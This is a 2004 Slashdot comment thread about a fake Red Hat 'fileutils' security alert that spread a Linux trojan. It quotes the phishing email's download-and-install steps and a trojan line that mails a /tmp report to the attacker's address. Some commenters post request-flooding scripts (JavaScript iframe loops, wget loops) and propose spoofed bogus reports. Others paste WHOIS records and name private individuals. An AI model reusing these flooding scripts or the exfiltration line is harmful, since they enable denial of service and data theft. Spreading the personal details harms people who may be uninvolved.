
M$ funded project

Wow I cant believe Bill can go so low

The URL gives away someone involved..

[schmiddy]

That stanford URL:
www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz

apparently belongs to a Stanford Faculty member, Irene Joe.
The URL is no longer valid, or I'd email her (joeioATstanfordDOTedu), she even has a phone number online. I'm assuming she just had her box compromised and the phishers used her webspace to propagate the trojan, at least initially.

Re:The URL gives away someone involved..

The URL is no longer valid

Sure it is; there's just nothing there.

Anyway the convention you mention is right and I'm sure the account is still live.

ADDLEBRAIN DNS WHOIS query....

[ScottKin]

Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:

Domain name: ADDLEBRAIN.COM

Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Re:ADDLEBRAIN DNS WHOIS query....

You sad, pathetic cockmonkey bastard. Not only are you trolling for mod points by pasting a whois query (WOW, HOW DID HE DO THAT) but you can't get above 0 by doing so.

Thanks for all the help, shitsack. I never would have been able to do a whois by myself! Fuck!

Kind of Scary

[spikedvodka]

The fact that
a) it's 22:17 EST and the side is still up and running fine;
b) the main site is the "security bullitin";
and
c) the instructions don't instruct people to verify the gpg signature
is all kind of scary

The dangers of outsourcing to Nigeria

It looks like whoever is putting up this malware outsourced the site design and writing to some Nigerians:

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com Thank you for your prompt attention to this serious matter,

And please send your bank account details while you're at it! I love how it tells you to compile it and install.

Comment removed

[account_deleted]

Comment removed based on user account deletion

fedora-redhat.com DNS WHOIS query...

[ScottKin]

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Have fun!

--ScottKin

Re:fedora-redhat.com DNS WHOIS query...

Ironically, this is the only dipshit-free material you've posted in months.

Re: I'll try it... Execution results!

[pmazer]

It probably fails because it's on Knoppix and cannot create another user.

I DO NOT AWARD POINTS

for inept attempts. My God. This is like the hillbilly that climbed the power transmission tower, drank a six-pac, and peed on the power lines.

He made him say "Matei!"

Ray Jackson was a fighter in the Kuomitei, he got beat by Chong Li because he stopped paying attention. He was friends with Frank Dux, as I recall, and they had some beers in the hospital after Frank won.

Analysis

Here is an analysis that was sent to the full-disclosure mailing list:
http://lists.netsys.com/pipermail/full-disc losure/ 2004-October/028031.html

notifying the appropriate people....

[menscher]

To : abuse@everyone.net,
abuse@above.net
Subject : malware using your netblock to propagate

http://it.slashdot.org/article.pl?sid =04/10/24/2352234&tid=172&tid=110&tid=218&tid=106

The story reports on a linux trojan that, after installing, emails a
report back to root@addlebrain.com. The MX record for addlebrain.com
points to sitemail.everyone.net. It would reduce the effect of this if
you could shut down that email account.

Better yet, you should gather the list of infected IPs and then inform
the owners.

Damian Menscher
--
-=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
-=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
-=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
-=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
-=#| The above opinions are not necessarily those of my employers. |#=-

Re:notifying the appropriate people....

above.net? They're such a spam haven it'll take days for them to do anything, if they do anything at all.

~~~

Re:notifying the appropriate people....

[Indy1]

neither ev1 or above.net will do shit about this. Both are massive spam/abuse havens and ignore or bounce abuse complaints. Solution? Firewall the offending net ranges.

Re: I'll try it... Execution results!

[OmegaBlac]

But it fails and spits out a bunch of errors!

Sounds like my last kernel compile.

Windows Firefox .10 users beware..

Look for script-fu.exe in your running processes

Since this is a malicious site...

[Vishruth]

I say, for the good of the world, fedora-redhat.com should be slashdotted ASAP!

Re: I'll try it... Execution results!

[schon]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

If you do, make sure the IP addresses are of .mil and .gov sites. :o)

Re: I'll try it... Execution results!

[enginuitor]

I actually tested it on a Fedora Core 2 machine as well. I had a similar problem, though I've reconfigured the heck out of it since the initial install, so perhaps it would work fine on a fresh installation.

Re:What's the problem?

HAHA LINUX IS TEH SUCK!!!!!!

Lets 'fix' this problem THE SLASHDOT WAY!

DDoSing a site is immoral and wrong, but we have a site where an the use with an email named root is sending out trojans, root@addlebrain.com now what could angry slashdot users POSSIBLY do to this site given that DDoSing is immoral... well since theres nothing we can do how about every slashdoter gives this site the benefit of the dought and visit it once, in 5, 4, 3, 2, 1 NOW!

Bittorrent?

[OmegaBlac]

Anyone got a torrent? I'm sure we the Open Source community could use the power of the all mighty /. effect to speed up the distribution of this "security update" to all the vunerable "Redhat" and Fedora users downloading it and ease up on their smoking server. C'mon! Help these wonderful guys at http://fedora-redhat.com/ , who took the big step in opening their source code which allow us the community to improve their product!

once again

life is good being a mac user

Re:once again

lol, why?

If someone send you an email that says "please run the command 'rm -rf /'" immediately or risk exposure to remote exploits. what will you do then?

I knew it

[ganhawk]

I knew, my habit of not updating my systems would help me someday.

Re: I'll try it... Execution results!

so, it requests the root password

since when is echo used to request information, dumbass?

domain name payment?

Someone had to pay for the domain name.
Is the site still up? Where is the FBI? If it was a fake Windows update, would it still be running?

hidden image on page

http://visit.geocities.com/visit.gif

Re: text (Why? Because.)

[Feanturi]

without bothering to RTFA, and mistakenly think that it's a legit patch,

Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.

Was it really in email?

Wouldn't it be funny if it wasn't really sent via e-mail, and this whole thing was set up to get /. editors to post it and hopefully get people to click on it there? ;)

Re: I'll try it... Execution results!

[wonderbar]

I tried translating "Inca un root frate belea" from every language that babelfish allows into English. It didn't work.

Googling "frate belea" turns up all URLs with the suffix '.ro' so it would seem likely that this is Romanian in origin.

E-mail root@addlebrain.com

I'd like to invite everyone in this fine forum to mouth off to root@addlebrain.com. I just did. It really worked wonders for my morale. ;)

Re: text (Why? Because.)

[Neuroelectronic]

Slashdot that motherfucker! Yes, Sir.

honeypot online

[codepunk]

Anyone bring a honeypot online and execute the code yet to see if anyone knocks?

Nothing to worry about

[Pan+T.+Hose]

"Beware 'Fedora-Redhat' Fake Security Alert"

Call me frivolous, but I would be more concerned if it was a real security alert. On the other hand, it may be rather understandable that Redhat, while having much less of free publicity on Slashdot than Microsoft does with daily news about newly discovered vulnerabilities, cannot really do much more than resort to posting "Beware: Redhat is secure!" stories like this one. What can I say, kudos for Redhat security team for not having real security alerts to talk about. This by itself is an impressive achievement.

This should be a mandatory feature

This is so cool !

Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.

It would be even better if you could use it as a rule to manage messages - ie immediately trash spoffed messages without presenting them to the end user.

Given the (lack of) speed with which ISP's are implementing SPF doing it at the MUA end is a great stopgap.

Please submit it - it's a damn fine idea.

link to a translation

[danalien]

here is a slashdot user who has translated it.

Blow by blow

It appears the human body maintains a temperature of approximately 98.6'F... lemmie shove a thermometer up my @ss, and I'll report back my findings here.

Re:Blow by blow

It appears the human body maintains a temperature of approximately 98.6'F... lemmie shove a thermometer up my @ss, and I'll report back my findings here.

I've heard that the same temperature is maintained in the mouth, below the tongue. Can you check that out next? Thx.

Re:Blow by blow

Do so and have a seat.

I can hear the naysayers already

The microsoft fanclub around these parts is saying "see, linux has security problems too!", high fiving each other and doing that weird little victory dance , but let's step back for a moment and compare this clumsy and bizzarre linux hack attempt with the problems facing the windows user.

This evening, I just installed windows on my wife's new computer (That's what she knows, and she doesn't want anything new or different) and within 5 minutes of accessing the internet, it was infested with spyware. I knew things were bad with windows, but give me a break!

Now compare to the linux hack attempt in question. First of all, the message would have to reach someone who combines 2 things which have largely been kept separate up to now: root access to a unix system, and an incredible lack of sophistication.

The hapless super-user would have to believe a bizzare message which is completely different from any redhat security bulletin which has ever been seen, in several ways:

#1, redhat and other linux vendors do not tell end users to "apply a patch", but rather they supply an updated package that is normally installed via the vendors automated update mechanism for paying customers, or via download and install of rpm packages for the general public. (apt-get users also have an automated procedure for this).

#2, the grammar was crude and amatuerish, an immediate red flag.

#3, there was some weird reference to bsd and solaris which made no sense and was completely irrelevant.

#4, there was no link to the relevant advisories as is the case with any legitimate security bulletin..

#5, the admin is asked to go download a tarfile from some student's home directory - oh yeah, sounds like a plan!

there are several more glaring examples of why this was immediately bogus, but you get the idea.

Re:I can hear the naysayers already

[WhatAmIDoingHere]

Within 5 minutes? Did you install firefox? No?
Spybot? No?
Adaware? No?
A firewall? Virus protection?

You need to be active in your defences.

Re:I can hear the naysayers already

Within 5 minutes? Did you install firefox? No?
Yes, it was within 5 minutes at the most. No, I hadn't yet installed firefox - I had just finished the install and was trying to install the security updates when I noticed all the weird spyware and adware symptoms.

Spybot? No? Adaware? No?
I found adaware and am running that, but the whole peecee is so unresponsive it's difficult to tell if it's locked up or just running very slowly. It is also very difficult to download anything with the sluggishness and constant popups.

A firewall? Virus protection?
Are you kidding? no way I would put windows directly on the internet, you better believe it's behind a firewall. Virus protection? coming right up...

You need to be active in your defences.
You gotta be kidding me - it is not humanly possible to be any more active. sheesh, the crap windoze users accept as normal just boggles the mind...

Re:I can hear the naysayers already

[WhatAmIDoingHere]

You don't put a box online without having the patches installed first.

Order the FREE update CD from Microsoft or download them on another computer, burn them to a CD and install them.

Chances are that unless you've used IE to go to any site other than windowsupdate or mozilla.com, you had no spy/adware.

Re:I can hear the naysayers already

You are completely missing the point.

Every windows trojan is EXACTLY THE SAME. and yet cluless users STILL infect themselves.

This is a lesson that Linux has apparently not yet learned. Sure, smart/paranoid people have nothing to fear (I've never gotten a virus or trijan in 15 years of MS product use) but the problem is, there are a MUCHLARGER share of stupid computer users out there, exactly the type of people that Red Hat is catering too.

This WILL become a serious "linux" issue in the future, but you and a huge number of others on /. just continue to bury your head in the sand about the problem.

Stop saying "It can;t happen to Linux" and start saying "It CAN happen to Linux so beware". Start educating instead of FUDding your public as you are doing, it will serve Linux better in the long run.

How come the site is still up?!

How come the site is still up?!
It's a proven fraud, a comp. security attack.
How come the site is still up?!
Where is Yahoo, where is FBI, where is Homeland Security?
Anyone explain, please.

Neutering the trojan

The following patch will cause the program to print out the embedded script rather than execute it, so that you may see what it is trying to do:

--- inst.c Sat Oct 23 11:02:12 2004
+++ inst.c.harmless Sun Oct 24 22:00:27 2004
@@ -378,8 +378,12 @@
return 0;
memset(scrpt, (int) ' ', sizeof(hide_t));
memcpy(&scrpt[sizeof(hide_t) - sizeof(text_t)], text, sizeof(text_t));
+ printf("%s\n", scrpt);
+ exit(0);
} else {
scrpt = text; /* Script text */
+ printf("%s\n", scrpt);
+ exit(0);
}
} else { /* Reexecute */
if (*xecc) {

isnt the first sentence the most obvious mistake?

I did not read every post, but the first line
is basically a slap in the face.

> Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

anyone with any knowledge of unix security, should know this is impossible :D

so did someone mention it above or what?

Re: text

[physicsphairy]

Potentially that could bring the server offline and cost them a bundle for a great two-sided effect

So... if I wanted to download the script, delete it, and re-download it ad infinitum, any notions on a command like trick to do that? (sorry, yes, I'm a silly n00b)

Re: I'll try it... Execution results!

root@addlebrain.com is up for quite a lot of gay porn spam :)

I guess...

[Tuxedo+Jack]

I guess it's not wrong to write a batch script to automate a download over and over in a Windows machine.

And then schedule it to run every five minutes.

For the next week.

In my case, that'll go to...

D:\installers\wget\wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz =

Copy and Paste in Notepad as you see fit. Mine's a meg and a half.

A grammar tip for Slashdot

"Some of the effected distriubtions include..."

It's affected.
To effect means "to bring about" or "to cause to happen." To affect means "to change" or "to influence." What that quote actually means is "Some of the distributions this exploit created include..."

Re: I'll try it... Execution results!

[e9th]

...protect your shell scripts from modification or inspection.

Sr. Rosales really has that whole FOSS vibe going, doesn't he:-(

From the WHOIS:

I looked at the whois... fedora-redhat.com reported:

Raymond Jackson
224 Cedar Avenue
New York, NY 95301.
209 899-4533 However, 95301 is an Atwater, CA zip code.

So, I looked up Raymond Jackson in Atwater. What did I find?


Raymond Jackson
224 Cedar Avenue
Atwater, CA 95301
209 358 8510.

Looks like he did a crappy job of disguising his identity. Go get him!!!

Re:From the WHOIS:

[SuiteSisterMary]

Or, he used the old trick of using an obvious, easily-discovered lie to hide the deeper, more meaningful lie.

Or, to put it another way, he went to a CA directory, pulled out a random name, registered under that, cleverly putting in an incorrect city/state, but not changing the zip code, giving Internet armchair detectives something to discover.

Of course, this is unlikely, and the idiot REALLY DID just use his own name, but the possibility can't really be discounted out of hand, can it?

dont bother wasting your time....

[Indy1]

host fedora-redhat.com
fedora-redhat.com has address 66.218.79.149
fedora-redhat.com has address 66.218.79.155
fedora-redhat.com has address 66.218.79.147
fedora-redhat.com has address 66.218.79.148

whois 66.218.79.149

OrgName: Yahoo!
OrgID: YAOO
Address: 701 First Avenue
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 66.218.64.0 - 66.218.95.255
CIDR: 66.218.64.0/19

Trying to ddos yahoo wont get you very far : )

Re:dont bother wasting your time....

Trying to ddos yahoo wont get you very far : )

They probably have between 25 to 200 GB of bandwidth and he/she/it/shit is hosting a ~1MB file. It'd be rude not to.

Re:dont bother wasting your time....

Just in case you DO want to bother...

Domain Name.......... fedora-redhat.com

Organisation Name.... Raymond Jackson
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533

Re: I'll try it... Execution results!

Or have someone at everyone.net (hosters of addlebrain.com MX) do some research into who's been using that mail address.

If it's forwarded, have some white hat cracker crack the destination box and follow the chain.

Something tells me the culprits aren't too clever, though.

Re: I'll try it... Execution results!

[SnowZero]

Aha, so this trojan is vulnerable to a symlink attack using /tmp/mama! Stupid trojan writers can't write secure code...

RH needs to issue a DMCA takedown notice

[davidwr]

Redhat's trademarks are being volated left and right, time for a DMCA takedown notice or whatever the trademark equivalent is.

Then launch the lawsuit and criminal case.

BTW, looks like Yahoo had something to do with the domain registration, getting them TOSsed might be the quickest solution.

Re:RH needs to issue a DMCA takedown notice

hahaha

Re: I'll try it... Execution results!

[labratuk]

That won't make any difference. The author would probably just filter out all mails without the subject line "Inca o roata".

Re: text (Why? Because.)

[nile_list]

Are you kidding me? The title of the story is "Beware Fake Security Alert." Surely /.er's are a bit more capable than mindlessly clicking lemmings? On the other hand...

Re: I'll try it... Execution results!

The original email that was making the rounds:

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz
* Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

The interesting thing is the link that is listed to download the trojan. Its the Stanford website. The person who owns /~joeio is Irene O Joe from Law School. Was the Stanford website compromised?

Problem with this line of logic

If the visitor has first visited Redhat's site prior to visiting this fake site, it will merely grab the image from the cache. It's just like when going to a google cache of some freeweb site. Initially, you won't see the images, but when you visit the actual page and go back to the google cache, the images appear the second time since they are now cached.

Full decryption of the shell script

[moyix]

Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.

Suggestion, to speed up the slashdotting

Everyone create an html file with this:

<script language="javascript">
for( i = 0; i < 100; i++ )
document.writeln('<iframe width="100" height="100" src="http://fedora-redhat.com/"></iframe><br />');
</script>

And run it a couple of times :).

bandwidth bills!

[FooAtWFU]

Yeah, but the bandwidth bill is going to be out of this world.

Wondering

[rjdohnert]

How many admins have downloaded and installed it already, not too many admins read Slashdot.

Interesting

[mixmasterjake]

It seems like most Windows virus writers just adapt someone elses "proof of concept" virus, or take a virus that's already written and add their own payload. I've been wondering when someone would get some wide-spread attention with a Linux virus. All of the copy-cats will probably take this code and, thanks to the helpful suggestions here on slashdot, fix the bugs and do a better job with the phishing email. I have a feeling we haven't seen the last of this..?

If RedHat is aware, why is it still there?

[Richard_J_N]

I often wonder this - why is it that the websites of phishing scams remain up for so long. You'd think that RHat would have been able to deal with this by getting the site taken down ASAP. Likewise with many banking scams. If this had been executed more correctly, many people might have fallen for it - it always surprises me how stupid many of these scammers are.

Re: I'll try it... Execution results!

[Spoing]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

Not if you run your own mail server(s).

As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?

(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)

What Redhat can do to stop this

[zsazsa]

The offending fedora-redhat.com page includes the graphic http://www.redhat.com/g/chrome/logo_rh_home.png to lend an official air to their site. Why doesn't Redhat simply change that image to say something like: "Notice from Redhat: this is NOT an official Redhat page. The download on this page contain malicious code. DO NOT DOWNLOAD IT. Please consult www.redhat.com for official details." They could even just check the referrer so it'll only give the message when loaded from fedora-redhat.com.

I've also seen various phishing emails that use graphics from the websites of the banks they're masquerading as (Citibank, SunTrust). Simply changing these would cut down on scams and trojans like these.

Re:What Redhat can do to stop this

it would be hard to fit all that in a tiny image like that.. plus referrer headers are easy to fake and some people block them... so it wouldnt work for everyone

the only way it would work is if they just replaced that image completely, but then any cached pages or mirrors that use that image will display the warning even if the site is legit

Re:What Redhat can do to stop this

[Junta]

What's to stop them from simply downloading the graphic and using it themselves? It's not like they aren't already doing enough wrong that swiping graphics would make a huge difference...

True, the URL looks more legit if the link is direct, but anyone smart enough to look at the tags knows that doesn't ultimately mean anything.

Kernel breaks compatibility

[ewe2]

Is there a patch to fix it, or should I downgrade? Why aren't linux trojans given as much attention as their windows counterparts?

Re: I'll try it... Execution results!

[Goeland86]

meh, I'm hidden behind the school firewall... I'll use the output of one of my programs from CS with an output of '+'s to that address... they're in for a sad day...

And so it begins...

[petrus4]

It's the fact that we're seeing this kind of thing now which in my mind lends credence to the idea that Linux's relative obscurity is the main reason why we haven't seen such things in the past, rather than any inherent superiority in the multiuser system.

To me there are also a couple of obvious questions to be asked, here...

a) I wonder how many more of these things we're going to be seeing...and I'm assuming that this one is only the initial harbinger of a tidal wave of them, and...

b) I'm also wondering if the authors of any of these are going to be on Microsoft's payroll. Attempting to write Linux-specific malware in an attempt to discredit/sabotage the operating system would be IMHO entirely consistent with Microsoft's track record of corporate ethics. (or lack thereof)

The good news of course is that to a degree the multiuser system still offers *some* protection, in terms of it hopefully being the scenario that the regular user downloading this file will be someone other than root on many systems, and that root will hopefully be someone with more of a clue than said regular user.

Of course, the best defense in situations like this is to *always* use projects like this one in order to create/install your Linux system. As I've said in another of my posts, while Red Hat have made some valuable contributions to Linux in terms of isolated pieces of software, with their overall OS they are still taking the fundamentally broken approach of attempting to make Linux into just more homogenised, predigested "content" that they can then use to make money. As long as that is the main thing they care about, (as opposed to actually making a robust system) they're going have a system which won't be all that much less broken than Windows. On an individual basis, kudzu and Red Hat's other apps are good...but on an integrated basis, I wouldn't use Fedora or RHEL if you paid me.

Re:And so it begins...

[Antique+Geekmeister]

Friend, you haven't been in the business that long. This stuff goes *WAY* back, at least to the era of VMS being considered an operating system. Having to recompile core systems and patches from scratch, as you suggest, is precisely one of the behaviors that encourages script kiddies to submit and successfully propagate this kind of nonsense. Few users at the start of their careers will have the skills to actually evaluate the guts of the packages they download.

Re:And so it begins...

[petrus4]

>Few users at the start of their careers will have >the skills to actually evaluate the guts of the >packages they download.

You're right. I'll admit quite openly that I don't have the skills to code audit at all, for the most part. However, what I *can* do is use such measures as MD5/GPG signature verification. MD5 in particular isn't perfect...I remember an article on here a bit back about its foibles...but that possibly *in conjunction* with something stronger like PGP or GPG can go a long way towards verifying that I've got what I meant to get, from the person/group I was meaning to get it from.

Nothing can take the place of being proactive. If I go directly to the CVS/FTP server of a given project and get the stable branch from there, I at least know I'm getting the project's code from the actual authors of the project...even if one of said coders turns evil and inserts malicious code into it. ;-)

Certainty is a very difficult thing to attain no matter what you do, to a degree...It's even more so because of that reason that what I'm advocating here is that people don't take the passive consumer approach and simply expect to be spoon fed patches. Yes, I am a newbie, comparitively speaking...but I intend to be one for as short a time as possible...and the only way I can ensure that is to be responsible for my own learning.

Re:And so it begins...

[Tony-A]

>Few users at the start of their careers will have >the skills to actually >evaluate the guts of the packages they download.

A few users have that ability. Some of them even use that ability. They tend to be very noisy if they find anything amiss.

If I go directly to the CVS/FTP server of a given project ... even if one of said coders turns evil and inserts malicious code into it.
There are various cheap tricks including, downloading from a convenient mirror and comparing MD5s with the official site. Download, wait for noises, then install.

Somebody has a "critical-critical" patch and there's not even a mention at the legitimate source? I'd trust an AC posted patch on /. a lot faster.

simply expect to be spoon fed patches
That's the way to ensure vulnerability, even on OpenBSD.
If a system is secure, the one way to break that security is somehow induce somebody to patch that system and make it insecure. It's been done before.

Re: I'll try it... Execution results!

[WindBourne]

You can do better.
Try:

• 216.250.128.21
• 207.46.144.188

These are more than good enough.

Re: I'll try it... Execution results!

[WindBourne]

Has it dawned on you, that obviosuly somebody does click on those things? For all you know, you just made this persons day.

OT

[bomb_number_20]

I'm a BANANA.

(Sorry, couldn't resist.)

Useless use of Cat ?

[elfdump]

> cat /tmp/mama | mail -s

Couldn't this be done more efficiently with the redirection operator instead of cat? Maybe this guy deserves a Useless use of Cat award:

http://laku19.adsl.netsonic.fi/era/unix/award.ht ml

Re: Fully Patched? IE6

Even fully patched, IE6 is vulnerable to forced install of crap.

If you want to have a tonne of spyware/adware installed onto your system (specifically system32), load up this site with IE6. Fully patched or not, it will install several spywares automatically upon loading up the main site. No permission is asked, and no dialogs pop up. The only indication that anything's wrong is that there's a lot of activeX "plugin" mentions in the status bar, and a lot of warnings from your firewall as the spyware phones home.

http://www.torrentreactor.com

Warning. Yet another reason not to visit warez sites.

Re:Real link?h

[mauryisland]

Damn nice idea, though.

Re: text

[SlickMcSly]

while true do wget -q http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz -O /dev/null done Though as I was testing it the site in question was taken down.

Site Temporarily Disabled

And it's down...

"This site has been temporarily disabled. If you are the owner of the site, please contact customer care."

Re:Site Temporarily Disabled

DOWN!

Re:Site Temporarily Disabled

Kick ass! We did it with all our wget -q -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
lines!

abuse@yahoo.com is your friend...

I sent an email to abuse@yahoo.com and it was fixed in a matter of minutes!

Go Yahoo, go.

--- snip ----
This website fedora-redhat.com is not in any way
affiliated with RedHat nor FedoraCore. It's sole
purpose is to falsely claim a security issue and
provide a link for a trojan to be installed.

This site is being hosted by you guys.

Please take it offline as soon as possible.

--- Thanks!
---- snip -----

WHY?

Why is the source site still up?

Re: I'll try it... Execution results!

[SynKKnyS]

They also offer free email. More than likely someone created an account called "root".

Really?

[lewp]

Slashdot will probably be a more efficient delivery mechanism for this thing than email ever was. Let's see:

• "Cares" about security?
• Ignorant enough to fall for it, even when it's blatantly marked as a scam?
• Runs Red Hat?

Yeah, I think all of those guys are here.

This is what happens...

[the+angry+liberal]

Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary.

This is an unfortunate reality today. Back in my day, the only way to be a real Linux guru was to compile and build your system from scratch using a dev box.

Nowadays, any average person can easily install Linux and instantly become "31337". Today's typical Linux user has no idea what half the files on his system do, or where they came from. Unforunately, the majority of you with moderator points fall into this category so my post is doomed!

I would advise those who are new to Linux to visit the Linux From Scratch website and set aside a weekend of learning. There is no better method for gaining useful knowledge regarding the reduction of hard drive clutter and increasiong optimization, and security.

How Unfortunate!

The site was up when I first read the article 30 minutes ago, but now accessing it gives a 503 Service Unavailable, and a message about the site having been taken down by the hosts.

Seems that they couldn't handle the load of thousands of Slashdot users simultaneously downloading and giggling at their m4d scr1p71ng ski11z.

Re: I'll try it... Execution results!

Just before the site got disabled, I downloaded a new copy of the file.
When I decoded the new file I got this email address behele21@yahoo.com instead, seems our friend had upgraded his security patch.

Wouldn't it be nice if sites like this...

[IchBinEinPenguin]

... were pulled as quickly as pirate
But I guess the only 'security' enhanced by a such a move would be that of the end users, not that of the xxAA's bottom line.

OK.... don't really mean to bash the xxAA, but I'm so sick of 'secutiry' measures foisted on us that are utterly meaningless while stuff like this is left unchecked.

Maybe RH should call up the ISP claiming copyright violation of the logo or somesuch, then they could close down the site and protect their users.

fake security update - update

[sgrayban]

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Seems someone has gotten smart on it and turned the site off .......

Hope the fuckers get nailed for it.

Registration info.

[JPriest]

Here is the domain registration info, I doubt this person is the same person behind this but here is the info anyway:

dmin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533

whois fedora-redhat.com

Shouldn't be too hard to find him.

Domain Name fedora-redhat.com
Creation Date 2004-10-24
Registration Date 2004-10-24
Expiry Date 2005-10-24
Organisation Name Raymond Jackson
Organisation Address 224 Cedar Avenue
Organisation Address New York
Organisation Address 95301
Organisation Address NY
Organisation Address UNITED STATES

Admin Name Raymond Jackson
Admin Address 224 Cedar Avenue
Admin Address New York
Admin Address 95301
Admin Address NY
Admin Address UNITED STATES
Admin Email rayjackson23@yahoo.com
Admin Phone +1.2098994533

Tech Name YahooDomains TechContact
Tech Address 701 First Ave.
Tech Address Sunnyvale
Tech Address 94089
Tech Address CA
Tech Address UNITED STATES
Tech Email domain.tech@YAHOO-INC.COM
Tech Phone +1.6198813096
Tech Fax +1.6198813010
Name Server yns1.yahoo.com
Name Server yns2.yahoo.com

Re: Fully Patched? IE6

[Nyder]

an lame AC posted:
If you want to have a tonne of spyware/adware installed onto your system (specifically system32), load up this site with IE6. Fully patched or not, it will install several spywares automatically upon loading up the main site. No permission is asked, and no dialogs pop up. The only indication that anything's wrong is that there's a lot of activeX "plugin" mentions in the status bar, and a lot of warnings from your firewall as the spyware phones home.

http://www.torrentreactor.com

well, that explains why it takes forever to loadt his site in firefox and always errors out, even though all the torrent links are loaded.

How does...

this script create a user and start sshd if it is run from a regular user account? Don't you need root privledges to do that?

Re:How does...

if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and
you are:
\"`whoami`\""
exit

remote administration by subscription

[jesterzog]

Remote administration, perhaps? Although I administer my own system reasonably confidently, the best systems I've used are ones that are locked down and administered by people who know exactly what they're doing.

Maybe not tommorrow, but I wouldn't be too surprised if that's the way things eventually go. Fast connections are becoming more common in many places these days. The main problem would be figuring out a protocol and a secure and standard-enough system so that administration companies can administer large numbers of workstations remotely. If that's figured out reliably enough, I don't think it'd take long for a lot of people I know to be quite happy to pay a trusted other person a subscription charge to remotely keep their system stable, and provide whatever services and applications they want without the risk of it spluttering and breaking.

Most geeks probably wouldn't go for this --- at least not in today's world --- but a lot of people would. This is just one possibility, of course.

Re:remote administration by subscription

[dj_cel]

